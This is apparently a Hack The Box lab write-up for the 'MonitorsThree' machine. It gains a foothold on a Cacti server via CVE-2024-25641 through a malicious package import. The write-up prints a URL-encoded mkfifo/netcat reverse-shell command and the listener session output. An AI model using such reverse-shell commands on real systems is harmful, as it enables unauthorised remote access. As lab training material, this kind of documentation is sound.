InfoSec LAB

MonitorsThree_Exploitation

Created: 2 min read

CVE-2024-25641

The target Cacti instance has been identified to be vulnerable to a remote code execution vulnerability, CVE-2024-25641. In the following sections, I will attempt to gain the initial foothold via RCE

Import Packages is available under Import/Export

Loading the malicious package

Successfully imported the malicious package

Code execution confirmed

rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%2010.10.15.34%209999%20%3E%2Ftmp%2Ff Sending the reverse shell command through the cmd parameter

┌──(kali㉿kali)-[~/archive/htb/labs/monitorsthree]
└─$ nnc 9999                          
listening on [any] 9999 ...
connect to [10.10.15.34] from (UNKNOWN) [10.129.178.64] 36538
bash: cannot set terminal process group (1173): Inappropriate ioctl for device
bash: no job control in this shell
www-data@monitorsthree:~/html/cacti/resource$ whoami
whoami
www-data
www-data@monitorsthree:~/html/cacti/resource$ hostname
hostname
monitorsthree
www-data@monitorsthree:~/html/cacti/resource$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:94:df:5f brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.129.178.64/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 1966sec preferred_lft 1966sec
3: br-c7b83e1b07b0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:94:ce:d0:f1 brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-c7b83e1b07b0
       valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:d7:ee:27:62 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
6: veth275bc45@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-c7b83e1b07b0 state UP group default 
    link/ether 62:f4:de:68:2f:e1 brd ff:ff:ff:ff:ff:ff link-netnsid 0

Initial Foothold established to the target system as the www-data account via exploit CVE-2024-25641

Interactive Graph View

Backlinks